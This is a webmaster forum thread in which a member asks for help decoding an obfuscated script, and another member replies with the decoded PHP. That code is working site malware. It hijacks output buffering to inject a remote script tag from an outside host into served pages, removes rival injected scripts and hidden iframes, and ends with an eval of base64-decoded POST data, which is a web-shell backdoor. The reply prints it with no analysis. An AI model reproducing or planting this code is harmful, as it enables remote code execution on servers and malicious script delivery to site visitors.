Activity Stream
48,167 MEMBERS
6227 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Results 1 to 9 of 9

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1.     
    #1
    Member
    Website's:
    UsersTracking.com WhatIsNanoSim.com TVShowsBB.com WhatIsSurfaceTablet.com WhatIsLoan.net
    @johnburn, Many thanks KING!

    Please if you can help me with this code too,
    http://paste.org/pastebin/view/37506

    Regards.
    ChaoscripT Reviewed by ChaoscripT on . Help| Decode text Hi, Please help me to decode this code: Regards. Rating: 5
    Nano Sim Cutter | TVShowsBB.com | UsersTracking.com - Online Visitor Counter
    WhatIsSurfaceTablet.com | What Is Loan

  2.   Sponsored Links

  3.     
    #2
    Member
    Website's:
    vaporhostn.com
    Code: 
    <?php
    if (!function_exists('cdnlk')) {
        function cdnlk($s)
        {
            if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
                foreach ($a[0] as $v)
                    if (count(explode("\n", $v)) > 5) {
                        $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                        if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
                            $s = str_replace($v, '', $s);
                    }
            if (preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a))
                foreach ($a[0] as $v)
                    if (preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i', $v) && !strstr($v, '?' . '>'))
                        $s = preg_replace('#' . preg_quote($v, '#') . '.*?</iframe>#is', '', $s);
            $s = str_replace($a = base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3dyaXRlcnNwbHVzLm9yZy9hZG1pbmlzdHJhdG9yL3JvYm90cy5waHAgPjwvc2NyaXB0Pg=='), '', $s);
            if (stristr($s, '<body'))
                $s = preg_replace('#(\s*<body)#mi', $a . '\1', $s, 1);
            elseif (strpos($s, '<a'))
                $s = $a . $s;
            return $s;
        }
        function cdnlk2($a, $b, $c, $d)
        {
            global $cdnlk1;
            $s = array();
            if (function_exists($cdnlk1))
                call_user_func($cdnlk1, $a, $b, $c, $d);
            foreach (@ob_get_status(1) as $v)
                if (($a = $v['name']) == 'cdnlk')
                    return;
                elseif ($a == 'ob_gzhandler')
                    break;
                else
                    $s[] = array(
                        $a == 'default output handler' ? false : $a
                    );
            for ($i = count($s) - 1; $i >= 0; $i--) {
                $s[$i][1] = ob_get_contents();
                ob_end_clean();
            }
            ob_start('cdnlk');
            for ($i = 0; $i < count($s); $i++) {
                ob_start($s[$i][0]);
                echo $s[$i][1];
            }
        }
    }
    $cdnlkl = (($a = @set_error_handler('cdnlk2')) != 'cdnlk2') ? $a : 0;
    eval(base64_decode($_POST['e']));
    ?>

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Help| Decode Text
    By ChaoscripT in forum Web Development Area
    Replies: 5
    Last Post: 18th Oct 2012, 03:04 PM
  2. Help| Decode text
    By ChaoscripT in forum Web Development Area
    Replies: 5
    Last Post: 25th Apr 2012, 10:27 AM
  3. need help for decode
    By wakaski in forum Web Application/Script Support
    Replies: 1
    Last Post: 21st Jan 2012, 11:15 PM
  4. Decode Help
    By Rox in forum Web Development Area
    Replies: 2
    Last Post: 16th Jul 2011, 09:01 PM
  5. Decode this?
    By -Im.z2ight- in forum Webmaster Discussion
    Replies: 7
    Last Post: 8th Oct 2009, 01:47 PM

Tags for this Thread

BE SOCIAL